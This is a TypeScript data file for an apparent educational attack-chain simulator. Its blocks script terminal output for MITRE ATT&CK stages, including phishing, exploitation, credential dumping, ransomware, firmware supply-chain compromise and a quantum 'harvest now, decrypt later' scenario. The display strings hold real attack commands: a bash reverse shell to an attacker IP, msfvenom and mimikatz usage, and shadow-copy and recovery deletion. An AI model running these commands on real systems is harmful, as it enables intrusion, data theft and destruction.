import type { AttackBlock } from "@/types";

/* ============================================================
   BLOCK LIBRARY — CINEMATIC EDITION

   Each block emits realistic attacker tooling output. Lines use
   prefixes that the Terminal renders with appropriate styling:

   >>  shell prompt + command (rendered as `attacker@blackbox# cmd`)
   ##  section header / status (cyan, bold)
   --  output line (dim, fast type)
   ++  success line (green, fast type)
   !!  warning / error (amber/red)
   ~~  progress bar (animated fill)
   ==  divider / stage marker (cyan)
   (empty string = blank line)
   (no prefix) = plain output (muted)

   Tools referenced are real: msfvenom, gophish, mimikatz/kiwi,
   evil-winrm, impacket, BloodHound, Cobalt Strike, etc.
   IPs and hashes are fabricated for cinematic effect.
   ============================================================ */

export const BLOCKS: Record<string, AttackBlock> = {
  /* ============================================================
     INITIAL ACCESS
     ============================================================ */
  phishing: {
    id: "phishing",
    name: "Phishing Email",
    mitreId: "T1566",
    tactic: "initial-access",
    description: "Weaponize a Word doc with a macro and deliver via spoofed email.",
    icon: "Mail",
    successLines: [
      "## [reconnaissance] target: hr@mercygeneral.health",
      ">> msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.7 LPORT=443 -f docm -o /tmp/invoice_Q3_2025.docm",
      "-- [-] No platform was selected, choosing Msf::Module::Platform::Windows",
      "-- [-] No arch selected, selecting arch: x64 from the payload",
      "-- Found 11 compatible encoders",
      "~~ generating shellcode [4847 bytes]",
      "++ saved as: /tmp/invoice_Q3_2025.docm",
      "",
      ">> python3 ./gophish_send.py --target hr@mercygeneral.health --attach invoice_Q3_2025.docm --pretext 'Q3 invoice review'",
      "-- session: gophish-2026-04-28-T0214",
      "-- forging Reply-To: it-helpdesk@mercygeneral.health",
      "-- DKIM bypass via lookalike domain: mercygenera1.health",
      "-- relay: smtp.mailgun.net:587 (auth=ok)",
      "~~ delivering [47/47]",
      "++ delivery confirmed for 47 recipients",
      "++ tracking pixels armed",
      "== INITIAL ACCESS :: vector seeded ==",
    ],
    failLines: [
      ">> msfvenom -p windows/x64/meterpreter/reverse_https ...",
      "!! ERROR :: no inbox to deliver to in current attack context",
      "!! phishing must be the FIRST block in this chain",
      "== STAGE FAILED ==",
    ],
  },

  exploit_public: {
    id: "exploit_public",
    name: "Exploit Public Service",
    mitreId: "T1190",
    tactic: "initial-access",
    description: "Hit an internet-facing app with a known CVE for foothold.",
    icon: "Globe",
    successLines: [
      "## [reconnaissance] scanning external attack surface",
      ">> nmap -sV -p 80,443,8080,8443 vendor.targetcorp.io",
      "-- Starting Nmap 7.94 ( https://nmap.org )",
      "-- Nmap scan report for vendor.targetcorp.io (185.199.108.153)",
      "-- 80/tcp   open   http      nginx 1.18.0",
      "-- 443/tcp  open   ssl/http  nginx 1.18.0 (Spring Boot 2.5.4)",
      "-- 8080/tcp closed",
      "",
      ">> searchsploit 'Spring Boot 2.5.4'",
      "-- Spring Boot 2.5.x | Remote Code Execution (CVE-2024-XXXX)",
      "++ exploit found: 51247.py",
      "",
      ">> python3 51247.py -t https://vendor.targetcorp.io -c \"bash -i >& /dev/tcp/10.10.14.7/4444 0>&1\"",
      "~~ probing /actuator/env",
      "-- injecting JNDI gadget via X-Forwarded-For header",
      "++ HTTP 200 — payload accepted",
      "",
      ">> nc -lvnp 4444",
      "-- listening on [any] 4444",
      "++ connect from [185.199.108.153] 53112",
      "$ whoami",
      "-- spring-boot",
      "$ hostname",
      "-- ci-build-03.vendorco.internal",
      "== INITIAL ACCESS :: foothold on 10.0.4.18 ==",
    ],
    failLines: [
      ">> nmap -sV vendor.targetcorp.io",
      "!! ERROR :: external attack surface not in current scenario context",
      "!! wrong block for this stage",
      "== STAGE FAILED ==",
    ],
  },

  /* ============================================================
     EXECUTION
     ============================================================ */
  exec_macro: {
    id: "exec_macro",
    name: "Execute Macro",
    mitreId: "T1204",
    tactic: "execution",
    description: "User opens the Word doc, VBA macro fires, dropper deployed.",
    icon: "FileWarning",
    successLines: [
      "## [waiting] tracking pixel callbacks",
      "-- [t+00:14:23] hr-04 opened invoice_Q3_2025.docm",
      "-- [t+00:14:24] vba macro decoded — 47KB shellcode",
      "~~ unpacking shellcode in memory",
      "",
      ">> powershell.exe -enc JABjAD0AbgBlAHcALQBvAGIAagBlAGMAdAAg...",
      "-- AMSI bypass: amsi.dll patched via DllImport",
      "-- ETW provider: TamperWithEtwProvider() ok",
      "++ dropper.exe written to %TEMP%\\dropper.exe",
      "++ persistence: HKCU\\...\\Run\\WindowsHelper -> dropper.exe",
      "",
      ">> meterpreter session 1 opened (10.10.14.7:443 -> 10.0.5.42:51928)",
      "$ sysinfo",
      "-- Computer        : HR-WS-04",
      "-- OS              : Windows 10 Enterprise (10.0 Build 19045)",
      "-- Architecture    : x64",
      "-- Domain          : MERCYGEN",
      "-- User            : MERCYGEN\\sarah.morris",
      "-- Logged On Users : 1",
      "++ stable callback every 30s · jitter 12%",
      "== EXECUTION :: code running on HR-WS-04 ==",
    ],
    failLines: [
      "## [waiting] tracking pixel callbacks",
      "!! ERROR :: no payload delivered yet — nothing to execute",
      "!! execution requires a delivery vector first",
      "== STAGE FAILED ==",
    ],
  },

  /* ============================================================
     CREDENTIAL ACCESS
     ============================================================ */
  cred_dump: {
    id: "cred_dump",
    name: "Dump Credentials",
    mitreId: "T1003",
    tactic: "credential-access",
    description: "Mimikatz dumps NTLM hashes and Kerberos tickets from lsass.",
    icon: "KeyRound",
    successLines: [
      ">> meterpreter > getsystem",
      "-- got system via technique 1 (Named Pipe Impersonation)",
      "++ now running as NT AUTHORITY\\SYSTEM",
      "",
      ">> meterpreter > load kiwi",
      "-- Loading extension kiwi...",
      "--   .#####.   mimikatz 2.2.0 (x64) #19041 Apr 28 2026",
      "--  .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)",
      "--  ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ***/",
      "--  '#####'    > https://blog.gentilkiwi.com/mimikatz",
      "++ Success.",
      "",
      ">> meterpreter > creds_all",
      "## sekurlsa::logonpasswords",
      "",
      "-- Authentication Id : 0 ; 994 (00000000:000003e2)",
      "-- User Name         : sarah.morris",
      "-- Domain            : MERCYGEN",
      "-- Logon Server      : DC01",
      "--   * NTLM     : aad3b435b51404eeaad3b435b51404ee:8846f7eaee...",
      "--   * SHA1     : 8846f7eaee8fb117ad06bdd830b7586c8d7a2f0f",
      "",
      "-- Authentication Id : 0 ; 502 (00000000:00000142)",
      "-- User Name         : svc_backup",
      "-- Domain            : MERCYGEN",
      "--   * NTLM     : 64f12cddaa88057e06a81b54e73b949b:b938a0f...",
      "",
      "++ extracted 2 hashes · 1 kerberos TGT",
      "++ cached to /loot/mercygen_creds.txt",
      "== CREDENTIAL ACCESS :: domain creds harvested ==",
    ],
    failLines: [
      ">> meterpreter > getsystem",
      "!! ERROR :: no active session — lsass not reachable",
      "!! need code execution first",
      "== STAGE FAILED ==",
    ],
  },

  brute_force: {
    id: "brute_force",
    name: "Brute Force VPN",
    mitreId: "T1110",
    tactic: "credential-access",
    description: "Spray a leaked password list against the VPN gateway.",
    icon: "Hammer",
    successLines: [
      ">> hydra -L users.txt -P rockyou-2024.txt -t 4 vpn.targetcorp.io https-post-form",
      "-- Hydra v9.5 (c) 2026 by van Hauser",
      "-- target: vpn.targetcorp.io · service: https",
      "-- list size: users=42 passwords=14_341_564",
      "~~ spraying [t+00:00:30]",
      "-- [STATUS] 8021 attempts in 30 seconds (267/sec)",
      "~~ spraying [t+00:08:14]",
      "++ [443][https-post-form] login: backup_admin password: Summer2024!",
      "++ valid hit found",
      "== CREDENTIAL ACCESS :: vpn creds guessed ==",
    ],
    failLines: [
      ">> hydra -L users.txt vpn.targetcorp.io",
      "!! ERROR :: no exposed login surface in current scenario",
      "!! wrong block for this attack path",
      "== STAGE FAILED ==",
    ],
  },

  /* ============================================================
     LATERAL MOVEMENT
     ============================================================ */
  pass_the_hash: {
    id: "pass_the_hash",
    name: "Pass-the-Hash",
    mitreId: "T1550",
    tactic: "lateral-movement",
    description: "Reuse stolen NTLM hashes to authenticate to file servers.",
    icon: "ArrowRightLeft",
    successLines: [
      ">> impacket-psexec -hashes :8846f7eaee8fb117ad06bdd830b7586c MERCYGEN/sarah.morris@10.0.6.12",
      "-- Impacket v0.11.0 - Copyright Fortra, LLC.",
      "-- [*] Requesting shares on 10.0.6.12.....",
      "-- [*] Found writable share ADMIN$",
      "-- [*] Uploading file fHIeCNyu.exe",
      "-- [*] Opening SVCManager on 10.0.6.12.....",
      "-- [*] Creating service uYfL on 10.0.6.12.....",
      "-- [*] Starting service uYfL.....",
      "++ SMB session opened to fileserver01",
      "",
      ">> psexec> dir \\\\10.0.6.12\\C$\\PHI\\",
      "--  Volume in drive C is OS",
      "--  Directory of \\\\10.0.6.12\\C$\\PHI\\",
      "--  04/28/2026  09:14 AM  <DIR>          patients-2024",
      "--  04/28/2026  09:14 AM  <DIR>          patients-2025",
      "--  04/28/2026  09:14 AM  <DIR>          billing",
      "--  04/28/2026  09:14 AM  <DIR>          lab-results",
      "++ enumerated 12 admin shares · 4 with PHI",
      "== LATERAL :: pivot to fileserver01 successful ==",
    ],
    failLines: [
      ">> impacket-psexec -hashes ...",
      "!! ERROR :: no NTLM hash in memory to pass",
      "!! credential dump required first",
      "== STAGE FAILED ==",
    ],
  },

  /* ============================================================
     COLLECTION
     ============================================================ */
  stage_data: {
    id: "stage_data",
    name: "Stage Data",
    mitreId: "T1074",
    tactic: "collection",
    description: "Search shares for sensitive files, compress to single archive.",
    icon: "FolderArchive",
    successLines: [
      ">> Get-ChildItem -Recurse -Path \\\\10.0.6.12\\C$\\PHI -Include *.pdf,*.docx,*.xlsx,*.csv | Select FullName",
      "~~ enumerating shares · keywords: patient, ssn, claim, dob",
      "-- match: \\\\fileserver01\\PHI\\patients-2025\\sarah_morris_records.pdf",
      "-- match: \\\\fileserver01\\PHI\\billing\\claims_q1_2026.xlsx",
      "-- match: \\\\fileserver01\\PHI\\lab-results\\bloodwork_export.csv",
      "-- ... [14228 more files matched] ...",
      "++ total: 14,231 documents · 4.2 GB",
      "",
      ">> 7z a -t7z -mx=9 -p\"X9!kP2vQ\" /tmp/stage.7z @file_list.txt",
      "-- 7-Zip 22.01 (x64) : Copyright (c) 1999-2026 Igor Pavlov",
      "-- Scanning the drive: 14231 files, 4.2 GB (4290 MiB)",
      "~~ compressing [██████████] 100%",
      "-- Files read from disk: 14231",
      "-- Archive size: 1.8 GB",
      "++ archive ready: /tmp/stage.7z (encrypted)",
      "++ staged for exfil",
      "== COLLECTION :: 14,231 documents staged ==",
    ],
    failLines: [
      ">> Get-ChildItem -Recurse -Path ...",
      "!! ERROR :: no host access — cannot enumerate shares",
      "!! lateral movement or local execution required first",
      "== STAGE FAILED ==",
    ],
  },

  /* ============================================================
     IMPACT
     ============================================================ */
  encrypt_ransom: {
    id: "encrypt_ransom",
    name: "Encrypt & Ransom",
    mitreId: "T1486",
    tactic: "impact",
    description: "AES-encrypt every reachable file. Drop ransom note. Kill shadow copies.",
    icon: "Lock",
    successLines: [
      ">> ./locker.exe --target \\\\10.0.6.12\\C$\\ --mode aes-256-gcm --kill-shadows --note README_DECRYPT.txt",
      "##  ▒▒▒▒  PSY-LOCKER v3.1 — exclusive build  ▒▒▒▒",
      "-- [+] generating victim id: MERCY-7F2A-994B",
      "-- [+] sending public key to C2: hxxps://abc[.]onion/intake",
      "++ key registered with operator",
      "",
      ">> [encryption phase]",
      "~~ enumerating reachable filesystems",
      "-- target: \\\\10.0.6.12\\C$ (4.2 TB available)",
      "-- target: \\\\10.0.4.18\\D$ (1.1 TB available)",
      "-- target: \\\\10.0.7.33\\backups$ (8.4 TB available)",
      "~~ encrypting [████████████] 14,231 files · 100%",
      "++ all reachable files encrypted with AES-256-GCM",
      "",
      ">> [shadow copy elimination]",
      "-- vssadmin delete shadows /all /quiet",
      "-- wmic shadowcopy delete",
      "-- bcdedit /set {default} bootstatuspolicy ignoreallfailures",
      "-- bcdedit /set {default} recoveryenabled no",
      "++ recovery options destroyed",
      "",
      ">> [ransom note deployment]",
      "-- README_DECRYPT.txt written to every directory",
      "-- desktop wallpaper changed",
      "-- victim ID: MERCY-7F2A-994B",
      "-- demand: 50 BTC (~ $3.4M USD)",
      "-- deadline: 72 hours",
      "!! IMPACT :: hospital operations halted",
      "== ENCRYPT & RANSOM :: target compromised ==",
    ],
    failLines: [
      ">> ./locker.exe --target ...",
      "!! ERROR :: no staged data to encrypt — nothing to ransom",
      "!! collection step required before impact",
      "== STAGE FAILED ==",
    ],
  },

  /* ============================================================
     SUPPLY CHAIN SPECIFIC
     ============================================================ */
  steal_signing_key: {
    id: "steal_signing_key",
    name: "Steal RSA Signing Key",
    mitreId: "T1552",
    tactic: "credential-access",
    description: "Exfiltrate the firmware signing key from the build server.",
    icon: "FileKey2",
    successLines: [
      ">> ssh -i /tmp/foothold spring-boot@ci-build-03.vendorco.internal",
      "-- pivoting via existing reverse shell",
      "++ shell: spring-boot@ci-build-03",
      "",
      ">> find / -name '*.pem' -o -name '*.key' 2>/dev/null | grep -v node_modules",
      "-- /etc/ssl/private/server.key",
      "-- /home/jenkins/.ssh/id_rsa",
      "-- /opt/firmware/keys/firmware-rsa3072.pem  ← TARGET",
      "-- /opt/firmware/keys/firmware-rsa3072.pem.bak",
      "",
      ">> cat /opt/firmware/keys/firmware-rsa3072.pem",
      "-- -----BEGIN RSA PRIVATE KEY-----",
      "-- MIIG4wIBAAKCAYEAvJ8nTgFyaA1mZpHhKt7qPsLzWxR4dN6cVe...",
      "-- jR8hQ2vBpKnXm9fLwTzCdEYsP1aMoKgUyB4xZ7vQ3wHrIeNcKdLoP...",
      "-- ... [56 lines of base64] ...",
      "-- -----END RSA PRIVATE KEY-----",
      "++ private key acquired (RSA 3072-bit)",
      "",
      "## sanity check",
      ">> openssl rsa -in firmware-rsa3072.pem -check -noout",
      "++ RSA key ok",
      "++ HSM bypass: signing oracle exposed via /dev/shm/build_socket",
      "== KEY THEFT :: trusted root compromised ==",
    ],
    failLines: [
      ">> ssh ci-build-03.vendorco.internal",
      "!! ERROR :: not on vendor network — no key to steal",
      "!! need internal foothold first",
      "== STAGE FAILED ==",
    ],
  },

  modify_firmware: {
    id: "modify_firmware",
    name: "Modify Firmware",
    mitreId: "T1601",
    tactic: "persistence",
    description: "Inject backdoor into legitimate firmware image.",
    icon: "Cpu",
    successLines: [
      ">> wget https://update.vendorco.io/legit_firmware_v4.21.bin",
      "-- saving to: legit_firmware_v4.21.bin",
      "~~ downloading [████████████] 12.4 MB",
      "++ legit_firmware_v4.21.bin saved",
      "",
      ">> binwalk -e legit_firmware_v4.21.bin",
      "-- DECIMAL  HEXADECIMAL    DESCRIPTION",
      "-- 0        0x0            uImage header, image type: kernel",
      "-- 64       0x40           gzip compressed data",
      "-- 1638400  0x190000       Squashfs filesystem, version 4.0",
      "++ rootfs extracted to _legit_firmware_v4.21.bin.extracted",
      "",
      ">> ./inject.py --image legit_firmware_v4.21.bin --payload backdoor.bin --offset 0x4A1C00",
      "-- payload: implant.bin (12 KB) — reverse_https beacon",
      "-- target offset: 0x4A1C00 (post-init hook)",
      "~~ patching binary",
      "-- relocating original bytes to .pad section",
      "-- inserting jmp to payload entry",
      "-- recomputing CRC32: 0x8E4F2A1B → 0x8E4F2A1B ✓",
      "++ trojanized image: firmware_v4.22-x.bin (12.41 MB)",
      "",
      ">> sha256sum firmware_v4.22-x.bin",
      "-- 7e9d3f8a2b4c1d6e5f0a8b9c2d3e4f5a... firmware_v4.22-x.bin",
      "== PERSISTENCE :: backdoored firmware ready ==",
    ],
    failLines: [
      ">> binwalk -e legit_firmware.bin",
      "!! ERROR :: no signing key obtained — backdoor would never deploy",
      "!! steal the key first to make tampering useful",
      "== STAGE FAILED ==",
    ],
  },

  sign_with_stolen_key: {
    id: "sign_with_stolen_key",
    name: "Sign with Stolen Key",
    mitreId: "T1553",
    tactic: "persistence",
    description: "Re-sign trojanized firmware with the stolen RSA key.",
    icon: "PenTool",
    successLines: [
      "## [signing oracle ready] using stolen RSA-3072 key",
      "",
      ">> openssl dgst -sha384 -binary firmware_v4.22-x.bin > image.hash",
      "-- hash algorithm: SHA-384",
      "-- digest: 9f3c8e2a1b4d5f6c7e8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c...",
      "++ image hashed",
      "",
      ">> openssl pkeyutl -sign -inkey firmware-rsa3072.pem -in image.hash -out image.sig -pkeyopt digest:sha384",
      "~~ computing signature",
      "++ signature written: image.sig (384 bytes)",
      "",
      ">> ./vendor_sign_tool --image firmware_v4.22-x.bin --sig image.sig --append",
      "-- sig block appended at offset 0xBE7000",
      "-- header magic preserved: 0xVENDOR_FW_V4",
      "-- vendor metadata: { signed_by: 'vendor-prod-ca', date: '2026-04-28' }",
      "++ output: firmware_v4.22-x_signed.bin",
      "",
      "## verification (defender's pov)",
      ">> ./vendor_verify --image firmware_v4.22-x_signed.bin --ca vendor-prod-ca.pem",
      "-- checking signature against vendor production CA...",
      "-- signature algorithm: RSA-PSS-SHA384",
      "-- chain of trust: vendor-prod-ca → firmware-rsa3072",
      "++ SIGNATURE VALID ← image will pass every check",
      "!! firmware is mathematically indistinguishable from a real one",
      "== PERSISTENCE :: backdoor wears a real signature ==",
    ],
    failLines: [
      ">> openssl pkeyutl -sign ...",
      "!! ERROR :: missing prerequisites (key + modified image both required)",
      "!! check the order of your blocks",
      "== STAGE FAILED ==",
    ],
  },

  push_update: {
    id: "push_update",
    name: "Push Firmware Update",
    mitreId: "T1195",
    tactic: "impact",
    description: "Distribute via the vendor's own auto-update channel.",
    icon: "UploadCloud",
    successLines: [
      ">> aws s3 cp firmware_v4.22-x_signed.bin s3://vendorco-cdn/releases/v4.22/firmware.bin --acl public-read",
      "-- upload: firmware_v4.22-x_signed.bin to s3://vendorco-cdn/...",
      "~~ uploading [████████████] 12.41 MB",
      "++ s3 upload complete (HTTP 200)",
      "",
      ">> ./publish_manifest.py --version 4.22 --rollout immediate --target all",
      "-- generating manifest.json",
      "-- {",
      "--   \"version\": \"4.22\",",
      "--   \"sha256\": \"7e9d3f8a2b4c1d6e5f0a8b9c2d3e4f5a...\",",
      "--   \"signature\": \"signed by vendor-prod-ca ← APPEARS LEGITIMATE\",",
      "--   \"rollout_strategy\": \"immediate\",",
      "--   \"target_fleet\": 2847",
      "-- }",
      "++ manifest signed and published",
      "",
      ">> [auto-update telemetry feed]",
      "-- [04:14:12] manifest published to update.vendorco.io",
      "-- [04:14:18] 142 servers checking in...",
      "-- [04:14:31] 891 servers checking in...",
      "-- [04:14:47] 2,103 servers checking in...",
      "~~ rolling out [████████████] 2,847/2,847",
      "++ 100% of fleet updated to v4.22 (TROJANIZED)",
      "",
      "!! IMPACT :: 2,847 customer servers running attacker code",
      "!! every customer of VendorCo just got backdoored",
      "== SUPPLY CHAIN :: pwned ==",
    ],
    failLines: [
      ">> aws s3 cp firmware ...",
      "!! ERROR :: no signed payload to ship",
      "!! sign the trojanized firmware first",
      "== STAGE FAILED ==",
    ],
  },

  /* ============================================================
     QUANTUM HEIST — harvest now, decrypt later
     ============================================================ */
  capture_tls: {
    id: "capture_tls",
    name: "Capture TLS Traffic",
    mitreId: "T1040",
    tactic: "collection",
    description: "Tap a backbone link, record encrypted handshakes for later.",
    icon: "Wifi",
    successLines: [
      "## [year 2025] state-level adversary · long horizon",
      "",
      ">> ./tap_install.sh --link AS6939-AS15169 --location ix-frankfurt-de-cix",
      "-- coordinating with friendly carrier...",
      "-- physical tap installed at DE-CIX Frankfurt",
      "-- mirror traffic: 100Gbps eastbound + westbound",
      "++ tap online · attacker-side mirror live",
      "",
      ">> tcpdump -i tap0 -w /capture/2025-q3-targetcorp.pcap 'tcp port 443 and host targetcorp.io'",
      "-- listening on tap0 · link-type EN10MB",
      "-- filter: dst-port 443 + tls 1.2/1.3 handshakes",
      "~~ capturing [t+30 days]",
      "-- packets captured:    1,847,212,884",
      "-- TLS handshakes:       4,829,142",
      "-- size:                 41.7 GB (gzip)",
      "++ ciphertext archive seeded",
      "",
      "## what's in this archive",
      "-- HTTPS sessions (banking, email, internal apps)",
      "-- VPN handshakes (RSA-2048 KEX)",
      "-- IMAP/SMTP traffic (TLS 1.2)",
      "-- API calls (mutual-auth TLS)",
      "++ 4.8M handshakes — all opaque to us TODAY",
      "++ all decryptable LATER, when CRQC arrives",
      "== COLLECTION :: 41.7 GB of pcap captured ==",
    ],
    failLines: [
      ">> ./tap_install.sh ...",
      "!! ERROR :: capture is the FIRST step in harvest-now-decrypt-later",
      "!! you have nothing to harvest with the wrong block here",
      "== STAGE FAILED ==",
    ],
  },

  store_ciphertext: {
    id: "store_ciphertext",
    name: "Store Ciphertext",
    mitreId: "",
    tactic: "collection",
    description: "Archive the captured traffic. Wait. Patience is the weapon.",
    icon: "Database",
    successLines: [
      ">> ./archive.py --src /capture/2025-q3-targetcorp.pcap --dst cold-storage://vault-9 --replicate 3 --retention indefinite",
      "## [cold storage cluster] vault-9.adversary.local",
      "",
      "-- chunking pcap into 1GB shards · 42 chunks",
      "~~ encrypting at rest [AES-256-GCM] · operator-held key",
      "~~ uploading to vault-9 [████████████] 42/42",
      "++ primary copy: vault-9-fra (Frankfurt)",
      "++ replica:      vault-9-sgp (Singapore)",
      "++ replica:      vault-9-anc (Anchorage)",
      "",
      ">> ./index.py --register capture_2025_q3_targetcorp",
      "-- indexed 4,829,142 TLS handshakes",
      "-- indexed by: timestamp, src_ip, dst_ip, sni, cipher_suite",
      "-- queryable but not yet readable",
      "++ archive index entry: vault-9://archives/2025-q3-targetcorp",
      "",
      "## retention policy",
      "-- delete-after: NEVER",
      "-- access-control: operator only",
      "-- waiting for: cryptographically relevant quantum computer",
      "++ patience is the weapon",
      "== STORAGE :: ciphertext archived indefinitely ==",
    ],
    failLines: [
      ">> ./archive.py --src /capture/...",
      "!! ERROR :: nothing in the capture buffer to store",
      "!! capture traffic before storing it",
      "== STAGE FAILED ==",
    ],
  },

  wait_quantum: {
    id: "wait_quantum",
    name: "Wait for Quantum",
    mitreId: "",
    tactic: "quantum",
    description: "Be patient. The CRQC arrives. Years pass. The archive waits.",
    icon: "Hourglass",
    successLines: [
      "## [time skip — patience is the only resource]",
      "",
      "-- [year 2025] archive size: 41.7 GB · status: untouchable",
      "-- [year 2026] NIST PQC standards finalized · industry slow to migrate",
      "-- [year 2026] archive size: 312 GB (continued capture) · status: untouchable",
      "-- [year 2027] IBM hits 4,158 qubit Condor · still noisy · NOT relevant yet",
      "-- [year 2027] archive size: 1.4 TB · status: untouchable",
      "-- [year 2028] Google + IonQ + PsiQuantum: error correction breakthroughs",
      "-- [year 2028] archive size: 3.1 TB · status: untouchable",
      "-- [year 2029] lab demo: Shor breaks RSA-512 in 9 minutes · scaling proven",
      "-- [year 2029] archive size: 6.8 TB · status: untouchable",
      "",
      "## [year 2030] ── CRQC ONLINE ──",
      "++ cryptographically relevant quantum computer: 4,096 fault-tolerant qubits",
      "++ access negotiated · time slot booked",
      "++ window of opportunity OPEN",
      "",
      "!! every RSA/ECC handshake we recorded since 2025 is now decryptable",
      "!! today's secrets become tomorrow's plaintext",
      "== QUANTUM :: 5 years of patience pay off ==",
    ],
    failLines: [
      "## time-skip module loaded",
      "!! ERROR :: nothing in archive — what would we wait for?",
      "!! capture and store traffic before waiting",
      "== STAGE FAILED ==",
    ],
  },

  shor_decrypt: {
    id: "shor_decrypt",
    name: "Run Shor's Algorithm",
    mitreId: "",
    tactic: "quantum",
    description: "Factor every RSA modulus. Recover every session key.",
    icon: "Atom",
    successLines: [
      "## [CRQC online] queueing Shor on 4096-qubit fault-tolerant machine",
      "",
      ">> ./shor.py --target capture_2025_q3_targetcorp --extract-keys",
      "-- loading TLS handshakes from vault-9://archives/2025-q3-targetcorp",
      "-- 4,829,142 handshakes loaded",
      "-- extracting RSA public keys (modulus n, exponent e=65537)",
      "++ unique RSA-2048 moduli: 87,341",
      "",
      "## [factorization] — quantum period finding",
      "-- handshake 1/87341 :: n = 0xC8A9F2E1...",
      "~~ shor's algorithm running [████████████] 47 min",
      "-- period r = 0x4F3A2B... (found via QFT)",
      "-- gcd(a^(r/2)±1, n) = p, q",
      "++ p × q recovered",
      "++ private key reconstructed for handshake 1",
      "",
      "## [batch mode] processing remaining 87,340 keys",
      "~~ factoring [████████████] 87,341/87,341 keys",
      "++ all RSA-2048 moduli factored in 67h 14m total",
      "++ 87,341 RSA private keys recovered",
      "",
      "## [session key extraction]",
      "-- replaying TLS handshakes with recovered private keys",
      "-- decrypting pre-master secrets",
      "~~ extracting session keys [████████████] 4,829,142/4,829,142",
      "++ all 4.8M session keys recovered",
      "== QUANTUM :: rsa-2048 broken at scale ==",
    ],
    failLines: [
      ">> ./shor.py --target ...",
      "!! ERROR :: no archived ciphertext to factor",
      "!! the chain has to be: capture → store → wait → decrypt",
      "== STAGE FAILED ==",
    ],
  },

  open_vault: {
    id: "open_vault",
    name: "Open Decrypted Vault",
    mitreId: "T1530",
    tactic: "exfiltration",
    description: "Replay sessions. Extract plaintext. Read what was meant to stay private.",
    icon: "Unlock",
    successLines: [
      ">> ./decrypt.py --vault vault-9 --keys recovered_session_keys.json --output plaintext/",
      "-- loading 4,829,142 session keys",
      "-- replaying TLS records with AES-GCM decryption",
      "~~ decrypting [████████████] 41.7 GB → 38.2 GB plaintext",
      "++ all sessions reconstructed",
      "",
      "## [content reconstruction]",
      "",
      "-- reconstructing HTTP/2 streams...",
      "++ 2,147,889 customer records (PII: name, dob, ssn, address)",
      "++ 18,447 active API tokens",
      "++ 41,283 OAuth refresh tokens",
      "",
      "-- reconstructing IMAP/SMTP sessions...",
      "++ 5 years of executive email (CEO, CFO, GC)",
      "++ M&A communications (12 deals, including 3 unannounced)",
      "++ legal hold notices (8 active investigations)",
      "",
      "-- reconstructing internal app traffic...",
      "++ entire HR database (47,000 employees · 5 years)",
      "++ payroll · performance reviews · compensation · terminations",
      "++ source code repositories (mirrored from internal git)",
      "",
      "-- reconstructing VPN sessions...",
      "++ admin SSH sessions to production (full keystroke logs)",
      "++ database admin queries (full PII access patterns)",
      "",
      "## [sale prep]",
      "-- packaging archive for darknet market...",
      "-- listing: 'TargetCorp · 5yr historical · vault opened' · ask: 12,000 BTC",
      "++ buyer interest: 27 confirmed",
      "",
      "!! IMPACT :: 5 years of historical privacy fully gone",
      "!! the data was 'safe' in 2025 — it isn't in 2030",
      "== EXFIL :: vault opened · everything readable ==",
    ],
    failLines: [
      ">> ./decrypt.py --vault vault-9 ...",
      "!! ERROR :: no decryption keys — Shor's hasn't run yet",
      "!! the chain has to end with decrypt → open",
      "== STAGE FAILED ==",
    ],
  },
};

/** Resolve a block by id with proper typing. */
export function getBlock(id: string): AttackBlock {
  const block = BLOCKS[id];
  if (!block) throw new Error(`Unknown block id: ${id}`);
  return block;
}

/** All blocks as an array. */
export const ALL_BLOCKS = Object.values(BLOCKS);
